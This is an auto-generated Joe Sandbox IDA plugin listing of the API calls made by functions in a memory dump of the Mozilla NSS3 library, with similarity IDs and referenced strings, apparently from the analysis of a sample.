                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Alloc_Util$Arenamemcpy
                                                            • String ID:
                                                            • API String ID: 2632744278-0
                                                            APIs
                                                            • PORT_ArenaMark_Util.NSS3(?,6CA6CD93,?), ref: 6CA6CEEE
                                                              • Part of subcall function 6CA614C0: TlsGetValue.KERNEL32 ref: 6CA614E0
                                                              • Part of subcall function 6CA614C0: EnterCriticalSection.KERNEL32 ref: 6CA614F5
                                                              • Part of subcall function 6CA614C0: PR_Unlock.NSS3 ref: 6CA6150D
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CA6CD93,?), ref: 6CA6CEFC
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CA6CD93,?), ref: 6CA6CF0B
                                                              • Part of subcall function 6CA60840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA608B4
                                                            • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CA6CD93,?), ref: 6CA6CF1D
                                                              • Part of subcall function 6CA5FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CA58D2D,?,00000000,?), ref: 6CA5FB85
                                                              • Part of subcall function 6CA5FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CA5FBB1
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CA6CD93,?), ref: 6CA6CF47
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CA6CD93,?), ref: 6CA6CF67
                                                            • SECITEM_CopyItem_Util.NSS3(?,00000000,6CA6CD93,?,?,?,?,?,?,?,?,?,?,?,6CA6CD93,?), ref: 6CA6CF78
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                            • String ID:
                                                            • API String ID: 4291907967-0
                                                            APIs
                                                            • TlsGetValue.KERNEL32 ref: 6CA18C1B
                                                            • EnterCriticalSection.KERNEL32 ref: 6CA18C34
                                                            • PL_ArenaAllocate.NSS3 ref: 6CA18C65
                                                            • PR_Unlock.NSS3 ref: 6CA18C9C
                                                            • PR_Unlock.NSS3 ref: 6CA18CB6
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                            • String ID: KRAM
                                                            • API String ID: 4127063985-3815160215
                                                            APIs
                                                            • PR_EnterMonitor.NSS3 ref: 6CB12CA0
                                                            • PR_ExitMonitor.NSS3 ref: 6CB12CBE
                                                            • calloc.MOZGLUE(00000001,00000014), ref: 6CB12CD1
                                                            • strdup.MOZGLUE(?), ref: 6CB12CE1
                                                            • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CB12D27
                                                            Strings
                                                            • Loaded library %s (static lib), xrefs: 6CB12D22
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Monitor$EnterExitPrintcallocstrdup
                                                            • String ID: Loaded library %s (static lib)
                                                            • API String ID: 3511436785-2186981405
                                                            APIs
                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CA0BDCA
                                                              • Part of subcall function 6CA60FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA087ED,00000800,6C9FEF74,00000000), ref: 6CA61000
                                                              • Part of subcall function 6CA60FF0: PR_NewLock.NSS3(?,00000800,6C9FEF74,00000000), ref: 6CA61016
                                                              • Part of subcall function 6CA60FF0: PL_InitArenaPool.NSS3(00000000,security,6CA087ED,00000008,?,00000800,6C9FEF74,00000000), ref: 6CA6102B
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA0BDDB
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA0BDEC
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6116E
                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CA0BE03
                                                              • Part of subcall function 6CA5FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CA58D2D,?,00000000,?), ref: 6CA5FB85
                                                              • Part of subcall function 6CA5FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CA5FBB1
                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA0BE22
                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA0BE30
                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA0BE3B
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                            • String ID:
                                                            • API String ID: 1821307800-0
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CA91C74
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 6CA91C92
                                                            • free.MOZGLUE(?), ref: 6CA91C99
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 6CA91CCB
                                                            • free.MOZGLUE(?), ref: 6CA91CD2
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalDeleteSectionfree$ErrorValue
                                                            • String ID:
                                                            • API String ID: 3805613680-0
                                                            APIs
                                                            • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6C9F3D77,?,?,6C9F4E1D), ref: 6CAF1C8A
                                                            • sqlite3_free.NSS3(00000000), ref: 6CAF1CB6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: sqlite3_freesqlite3_mprintf
                                                            • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                            • API String ID: 1840970956-3705377941
                                                            APIs
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CA6ED6B
                                                            • PORT_Alloc_Util.NSS3(00000000), ref: 6CA6EDCE
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • free.MOZGLUE(00000000,?,?,?,?,6CA6B04F), ref: 6CA6EE46
                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CA6EECA
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CA6EEEA
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CA6EEFB
                                                            Similarity
                                                            • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                            • String ID:
                                                            • API String ID: 3768380896-0
                                                            APIs
                                                              • Part of subcall function 6CA6C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CA6DAE2,?), ref: 6CA6C6C2
                                                            • PR_Now.NSS3 ref: 6CA6CD35
                                                              • Part of subcall function 6CAC9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DC6
                                                              • Part of subcall function 6CAC9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DD1
                                                              • Part of subcall function 6CAC9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAC9DED
                                                              • Part of subcall function 6CA56C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA01C6F,00000000,00000004,?,?), ref: 6CA56C3F
                                                            • PR_GetCurrentThread.NSS3 ref: 6CA6CD54
                                                              • Part of subcall function 6CAC9BF0: TlsGetValue.KERNEL32(?,?,?,6CB10A75), ref: 6CAC9C07
                                                              • Part of subcall function 6CA57260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA01CCC,00000000,00000000,?,?), ref: 6CA5729F
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA6CD9B
                                                            • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CA6CE0B
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CA6CE2C
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • PORT_ArenaMark_Util.NSS3(00000000), ref: 6CA6CE40
                                                              • Part of subcall function 6CA614C0: TlsGetValue.KERNEL32 ref: 6CA614E0
                                                              • Part of subcall function 6CA614C0: EnterCriticalSection.KERNEL32 ref: 6CA614F5
                                                              • Part of subcall function 6CA614C0: PR_Unlock.NSS3 ref: 6CA6150D
                                                              • Part of subcall function 6CA6CEE0: PORT_ArenaMark_Util.NSS3(?,6CA6CD93,?), ref: 6CA6CEEE
                                                              • Part of subcall function 6CA6CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CA6CD93,?), ref: 6CA6CEFC
                                                              • Part of subcall function 6CA6CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CA6CD93,?), ref: 6CA6CF0B
                                                              • Part of subcall function 6CA6CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CA6CD93,?), ref: 6CA6CF1D
                                                              • Part of subcall function 6CA6CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CA6CD93,?), ref: 6CA6CF47
                                                              • Part of subcall function 6CA6CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CA6CD93,?), ref: 6CA6CF67
                                                              • Part of subcall function 6CA6CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CA6CD93,?,?,?,?,?,?,?,?,?,?,?,6CA6CD93,?), ref: 6CA6CF78
                                                            Similarity
                                                            • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 3748922049-0
                                                            APIs
                                                              • Part of subcall function 6CA95B40: PR_GetIdentitiesLayer.NSS3 ref: 6CA95B56
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA93D3F
                                                              • Part of subcall function 6CA0BA90: PORT_NewArena_Util.NSS3(00000800,6CA93CAF,?), ref: 6CA0BABF
                                                              • Part of subcall function 6CA0BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6CA93CAF,?), ref: 6CA0BAD5
                                                              • Part of subcall function 6CA0BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6CA93CAF,?), ref: 6CA0BB08
                                                              • Part of subcall function 6CA0BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CA93CAF,?), ref: 6CA0BB1A
                                                              • Part of subcall function 6CA0BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6CA93CAF,?), ref: 6CA0BB3B
                                                            • PR_EnterMonitor.NSS3(?), ref: 6CA93CCB
                                                              • Part of subcall function 6CAC9090: TlsGetValue.KERNEL32 ref: 6CAC90AB
                                                              • Part of subcall function 6CAC9090: TlsGetValue.KERNEL32 ref: 6CAC90C9
                                                              • Part of subcall function 6CAC9090: EnterCriticalSection.KERNEL32 ref: 6CAC90E5
                                                              • Part of subcall function 6CAC9090: TlsGetValue.KERNEL32 ref: 6CAC9116
                                                              • Part of subcall function 6CAC9090: LeaveCriticalSection.KERNEL32 ref: 6CAC913F
                                                            • PR_EnterMonitor.NSS3(?), ref: 6CA93CE2
                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA93CF8
                                                            • PR_ExitMonitor.NSS3(?), ref: 6CA93D15
                                                            • PR_ExitMonitor.NSS3(?), ref: 6CA93D2E
                                                            Similarity
                                                            • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                            • String ID:
                                                            • API String ID: 4030862364-0
                                                            APIs
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CA5FE08
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CA5FE1D
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6116E
                                                            • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CA5FE29
                                                            • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CA5FE3D
                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CA5FE62
                                                            • free.MOZGLUE(00000000,?,?,?,?), ref: 6CA5FE6F
                                                            Similarity
                                                            • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                            • String ID:
                                                            • API String ID: 660648399-0
                                                            APIs
                                                            • PR_Lock.NSS3 ref: 6CB0FD9E
                                                              • Part of subcall function 6CAC9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C9F1A48), ref: 6CAC9BB3
                                                              • Part of subcall function 6CAC9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C9F1A48), ref: 6CAC9BC8
                                                            • PR_WaitCondVar.NSS3(000000FF), ref: 6CB0FDB9
                                                              • Part of subcall function 6C9EA900: TlsGetValue.KERNEL32(00000000,?,6CB614E4,?,6C984DD9), ref: 6C9EA90F
                                                              • Part of subcall function 6C9EA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C9EA94F
                                                            • PR_Unlock.NSS3 ref: 6CB0FDD4
                                                            • PR_Lock.NSS3 ref: 6CB0FDF2
                                                            • PR_NotifyAllCondVar.NSS3 ref: 6CB0FE0D
                                                            • PR_Unlock.NSS3 ref: 6CB0FE23
                                                            Similarity
                                                            • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                            • String ID:
                                                            • API String ID: 3365241057-0
                                                            APIs
                                                            • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6CA4FC55
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA4FCB2
                                                            • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CA4FDB7
                                                            • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CA4FDDE
                                                              • Part of subcall function 6CA58800: TlsGetValue.KERNEL32(?,6CA6085A,00000000,?,6CA08369,?), ref: 6CA58821
                                                              • Part of subcall function 6CA58800: TlsGetValue.KERNEL32(?,?,6CA6085A,00000000,?,6CA08369,?), ref: 6CA5883D
                                                              • Part of subcall function 6CA58800: EnterCriticalSection.KERNEL32(?,?,?,6CA6085A,00000000,?,6CA08369,?), ref: 6CA58856
                                                              • Part of subcall function 6CA58800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CA58887
                                                              • Part of subcall function 6CA58800: PR_Unlock.NSS3(?,?,?,?,6CA6085A,00000000,?,6CA08369,?), ref: 6CA58899
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                            • String ID: pkcs11:
                                                            • API String ID: 362709927-2446828420
                                                            APIs
                                                            • memcmp.VCRUNTIME140(00000000,?,?), ref: 6C98BE02
                                                              • Part of subcall function 6CAB9C40: memcmp.VCRUNTIME140(?,00000000,6C98C52B), ref: 6CAB9D53
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C98BE9F
                                                            Strings
                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C98BE89
                                                            • %s at line %d of [%.10s], xrefs: 6C98BE98
                                                            • database corruption, xrefs: 6C98BE93
                                                            Similarity
                                                            • API ID: memcmp$sqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            • API String ID: 1135338897-598938438
                                                            APIs
                                                            • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C9F0BDE), ref: 6C9F0DCB
                                                            • strrchr.VCRUNTIME140(00000000,0000005C,?,6C9F0BDE), ref: 6C9F0DEA
                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C9F0BDE), ref: 6C9F0DFC
                                                            • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C9F0BDE), ref: 6C9F0E32
                                                            Strings
                                                            • %s incr => %d (find lib), xrefs: 6C9F0E2D
                                                            Similarity
                                                            • API ID: strrchr$Print_stricmp
                                                            • String ID: %s incr => %d (find lib)
                                                            • API String ID: 97259331-2309350800
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C999CF2
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6C999D45
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C999D8B
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6C999DDE
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 3168844106-0
                                                            APIs
                                                            • TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADE1B
                                                            • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6CAADE77
                                                            Similarity
                                                            • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                            • String ID:
                                                            • API String ID: 2700453212-0
                                                            APIs
                                                            • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6CA2BF06
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA2BF56
                                                            • PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA09F71,?,?,00000000), ref: 6CA2BF7F
                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6CA2BFA9
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA2C014
                                                            Similarity
                                                            • API ID: Item_Util$Zfree$CertificateDestroyEncodeError
                                                            • String ID:
                                                            • API String ID: 3689625208-0
                                                            APIs
                                                            • TlsGetValue.KERNEL32 ref: 6C9FEDFD
                                                            • calloc.MOZGLUE(00000001,00000000), ref: 6C9FEE64
                                                            • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C9FEECC
                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C9FEEEB
                                                            • free.MOZGLUE(?), ref: 6C9FEEF6
                                                            Similarity
                                                            • API ID: ErrorValuecallocfreememcpy
                                                            • String ID:
                                                            • API String ID: 3833505462-0
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,?,6CA26295,?,00000000,00000000,00000001,6CA42653,?), ref: 6CA41ECB
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • TlsGetValue.KERNEL32(?,00000001,?,?,6CA26295,?,00000000,00000000,00000001,6CA42653,?), ref: 6CA41EF1
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA41F01
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA41F39
                                                              • Part of subcall function 6CA4FE20: TlsGetValue.KERNEL32(6CA25ADC,?,00000000,00000001,?,?,00000000,?,6CA1BA55,?,?), ref: 6CA4FE4B
                                                              • Part of subcall function 6CA4FE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA4FE5F
                                                            • PR_Unlock.NSS3(?), ref: 6CA41F67
                                                            Similarity
                                                            • API ID: Value$CriticalEnterErrorSection$Unlock
                                                            • String ID:
                                                            • API String ID: 704537481-0
                                                            APIs
                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CA01E0B
                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CA01E24
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA01E3B
                                                            • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CA01E8A
                                                            • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CA01EAD
                                                            Similarity
                                                            • API ID: Error$Choice_DecodeTimeUtil
                                                            • String ID:
                                                            • API String ID: 1529734605-0
                                                            APIs
                                                            • PORT_ArenaMark_Util.NSS3(00000000,?,6CA03FFF,00000000,?,?,?,?,?,6CA01A1C,00000000,00000000), ref: 6CA0ADA7
                                                              • Part of subcall function 6CA614C0: TlsGetValue.KERNEL32 ref: 6CA614E0
                                                              • Part of subcall function 6CA614C0: EnterCriticalSection.KERNEL32 ref: 6CA614F5
                                                              • Part of subcall function 6CA614C0: PR_Unlock.NSS3 ref: 6CA6150D
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CA03FFF,00000000,?,?,?,?,?,6CA01A1C,00000000,00000000), ref: 6CA0ADB4
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,6CA03FFF,?,?,?,?,6CA03FFF,00000000,?,?,?,?,?,6CA01A1C,00000000), ref: 6CA0ADD5
                                                              • Part of subcall function 6CA5FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CA58D2D,?,00000000,?), ref: 6CA5FB85
                                                              • Part of subcall function 6CA5FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CA5FBB1
                                                            • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CB294B0,?,?,?,?,?,?,?,?,6CA03FFF,00000000,?), ref: 6CA0ADEC
                                                              • Part of subcall function 6CA5B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB318D0,?), ref: 6CA5B095
                                                            • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA03FFF), ref: 6CA0AE3C
                                                            Similarity
                                                            • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                            • String ID:
                                                            • API String ID: 2372449006-0
                                                            APIs
                                                            • PK11_GetInternalKeySlot.NSS3(?,?,?,6CA42E62,?,?,?,?,?,?,?,00000000,?,?,?,6CA14F1C), ref: 6CA28EA2
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CA4F854
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CA4F868
                                                              • Part of subcall function 6CA4F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CA4F882
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(04C483FF,?,?), ref: 6CA4F889
                                                              • Part of subcall function 6CA4F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CA4F8A4
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CA4F8AB
                                                              • Part of subcall function 6CA4F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CA4F8C9
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(280F10EC,?,?), ref: 6CA4F8D0
                                                            • PK11_IsLoggedIn.NSS3(?,?,?,6CA42E62,?,?,?,?,?,?,?,00000000,?,?,?,6CA14F1C), ref: 6CA28EC3
